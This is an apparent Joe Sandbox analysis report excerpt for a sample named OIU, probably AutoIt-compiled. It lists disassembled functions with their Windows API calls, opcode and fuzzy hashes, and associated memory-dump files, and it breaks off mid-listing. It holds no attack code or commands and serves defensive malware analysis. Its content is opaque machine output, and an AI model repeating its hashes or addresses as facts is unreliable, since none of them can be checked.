                                                                      • Instruction ID: c4729fdd6e982c54826d47325259358d8c59b5962af019d005f1069eb194cfcb
                                                                      • Opcode Fuzzy Hash: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
                                                                      • Instruction Fuzzy Hash: 1941D131618682BBC7398B298CC87BE7BD2EF56314F1444BCE5C663660C6B2E884DB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00C32D1B
                                                                      • GetDC.USER32(00000000), ref: 00C32D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C32D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C32D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C32D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C32D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C32DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C32DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                                      • Instruction ID: 31b6261eee0d0d822aabf925e3bada44ca674d44cc2840e4f167ce5f724c925c
                                                                      • Opcode Fuzzy Hash: 99cd2faa21060d25f366d367d9f4bf6dd2411d7132f23bde18177cc9705a7025
                                                                      • Instruction Fuzzy Hash: 6C317C72221214BFEF218F50CC8AFEF3BA9EF09715F044055FE08AA291C6759C50CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C05622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                                      • Instruction ID: 0e0e51fd9415383db205f976afe1ce0d1aab85cbedaf7a5e969b43b3f7a9985e
                                                                      • Opcode Fuzzy Hash: 55abef86493cfca93f0e4d0e26990acafdda22f1df15020e786e977237f075ff
                                                                      • Instruction Fuzzy Hash: D321DA61A50A09B7D31459159E82FBB339CEF61388F440438FD156A7C2F722EE11CDA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C24FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: dba97887acf9b99850cf5ed6ce1b17f179a6b1a2e0bba720480ffcc0267bd507
                                                                      • Instruction ID: 0e189781317020aa115ecfd1aee7172217ba0e17408f8f714a2675da2399b822
                                                                      • Opcode Fuzzy Hash: dba97887acf9b99850cf5ed6ce1b17f179a6b1a2e0bba720480ffcc0267bd507
                                                                      • Instruction Fuzzy Hash: F5D1D271A0062A9FDF10CFA8D880BAEB7B5FF48344F148069E925AB690D770DE41CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BE1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00BE15CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00BE17FB,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE16FB
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00BE1777
                                                                      • __freea.LIBCMT ref: 00BE17A2
                                                                      • __freea.LIBCMT ref: 00BE17AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: 9798bf93bf42f6c56788802e8f5ae85e24a97d12054abc5b47455e1444fd9114
                                                                      • Instruction ID: 884f689c7cfdc4124126ce3f8af008d29f15bd189863d0e9900f84f949d1b2a5
                                                                      • Opcode Fuzzy Hash: 9798bf93bf42f6c56788802e8f5ae85e24a97d12054abc5b47455e1444fd9114
                                                                      • Instruction Fuzzy Hash: 0D91A4B1E102969EDB208F7AC881EEEBBF5EF59710F284A99E812E7141D735DD40C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C24523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: 12de4954a60d0aaeefef1160dcb01b79b295797f7055eaee138230e9e25a0bf1
                                                                      • Instruction ID: b8148b542e4f29d9486c804ff52910afd6125c426bf15db2828104e75e2f9e98
                                                                      • Opcode Fuzzy Hash: 12de4954a60d0aaeefef1160dcb01b79b295797f7055eaee138230e9e25a0bf1
                                                                      • Instruction Fuzzy Hash: BE918471A00225AFDF24CFA5DC84FAEBBB8EF46B14F108559F525AB280D7709945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C11187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C1125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C11284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C112A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C112D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C1135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C113C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C11430
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                                      • Instruction ID: 4179aa64dee31607349ad856738b32bf37165cd2b4fcd80a86ada50d9c580290
                                                                      • Opcode Fuzzy Hash: e7778db587fb4478eb051814c46052705129e0aa636838b015ac1dcb9c91a1a0
                                                                      • Instruction Fuzzy Hash: 22910471A00219AFDB00DF94D884BFEB7F5FF46710F184029EA11E7291D778A981EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                                      • Instruction ID: 62d23c735b8524f03e68e08c489dd3de0b250face4f6c49e79fd8396272832c6
                                                                      • Opcode Fuzzy Hash: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                                      • Instruction Fuzzy Hash: 6F911571D40219EFCB14CFA9CC84AEEBBB8FF49320F148595E615B7251D7B4AA42CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C23947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00C2396B
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C23A7A
                                                                      • _wcslen.LIBCMT ref: 00C23A8A
                                                                      • VariantClear.OLEAUT32(?), ref: 00C23C1F
                                                                        • Part of subcall function 00C10CDF: VariantInit.OLEAUT32(00000000), ref: 00C10D1F
                                                                        • Part of subcall function 00C10CDF: VariantCopy.OLEAUT32(?,?), ref: 00C10D28
                                                                        • Part of subcall function 00C10CDF: VariantClear.OLEAUT32(?), ref: 00C10D34
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4137639002-1221869570
                                                                      • Opcode ID: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                                      • Instruction ID: fcabe4da6b58b6d1507983a4e233095037774fc98c98a31c83e3f65fa4de9a62
                                                                      • Opcode Fuzzy Hash: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                                      • Instruction Fuzzy Hash: 3091A874A083519FC700EF28C48096AB7E4FF89714F04896EF89A9B351DB34EE45CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C24BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C0000E: CLSIDFromProgID.OLE32 ref: 00C0002B
                                                                        • Part of subcall function 00C0000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C00046
                                                                        • Part of subcall function 00C0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                                        • Part of subcall function 00C0000E: CoTaskMemFree.OLE32(00000000), ref: 00C00064
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00C24C51
                                                                      • _wcslen.LIBCMT ref: 00C24D59
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C24DCF
                                                                      • CoTaskMemFree.OLE32(?), ref: 00C24DDA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 614568839-2785691316
                                                                      • Opcode ID: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                                      • Instruction ID: 9a60d1484e589c82f320a290da3187752ec272ac3137ae5538000d29b474bbcb
                                                                      • Opcode Fuzzy Hash: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                                      • Instruction Fuzzy Hash: 30912671D00229AFDF14DFA4D891AEEB7B8BF08304F108569E915A7291DB749A44CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenu.USER32 ref: 00C32183
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00C321B5
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C321DD
                                                                      • _wcslen.LIBCMT ref: 00C32213
                                                                      • GetMenuItemID.USER32(?,?), ref: 00C3224D
                                                                      • GetSubMenu.USER32 ref: 00C3225B
                                                                        • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                                        • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A5E
                                                                        • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C03A65
                                                                      • PostMessageW.USER32 ref: 00C322E3
                                                                        • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 4196846111-0
                                                                      • Opcode ID: e1a3ad9099f8589763c86e2101724c51d665cf2db834dbcdea625737e9070b8a
                                                                      • Instruction ID: e34065f48aca57e778595f211cfbf21ac9f6ae9e3713d95bf07cd46a011a964b
                                                                      • Opcode Fuzzy Hash: e1a3ad9099f8589763c86e2101724c51d665cf2db834dbcdea625737e9070b8a
                                                                      • Instruction Fuzzy Hash: F7718F75A10205AFCF10EF65C885AAEB7F5EF48320F148499E826EB351DB35EE419F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                                      • Instruction ID: b8ec5d739811dc8055c08656f38617b21061b43704c18e89b1168cd593e8a618
                                                                      • Opcode Fuzzy Hash: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                                      • Instruction Fuzzy Hash: 1351B3E06147D63DFB368374CC45BBA7EA95B06304F088589F1E9954C2C398AED4D751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                                      • Instruction ID: 07e637615d420927c51a212f172b6e0e138876feb67c32d5cb36adf9bc7a18c7
                                                                      • Opcode Fuzzy Hash: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                                      • Instruction Fuzzy Hash: 7F51F5A15087D53DFB378334CC95BBABEA85B46300F088489E1F5568C3D294EE98E762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32 ref: 00BD5470
                                                                      • __fassign.LIBCMT ref: 00BD54EB
                                                                      • __fassign.LIBCMT ref: 00BD5506
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BE3CD6,00000005,00000000,00000000), ref: 00BD552C
                                                                      • WriteFile.KERNEL32(?,00BE3CD6,00000000,00BD5BA3,00000000), ref: 00BD554B
                                                                      • WriteFile.KERNEL32(?,?,00000001,00BD5BA3,00000000), ref: 00BD5584
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                                      • Instruction ID: 4ccc948a2ac78f6c59ba463e308bcf961e14d2cdffd417775d8d04c03c7e48b7
                                                                      • Opcode Fuzzy Hash: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                                      • Instruction Fuzzy Hash: 0551C2749006499FDB21CFA8D881BEEFBF9EF18300F14415BE555E7391E6309A41CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
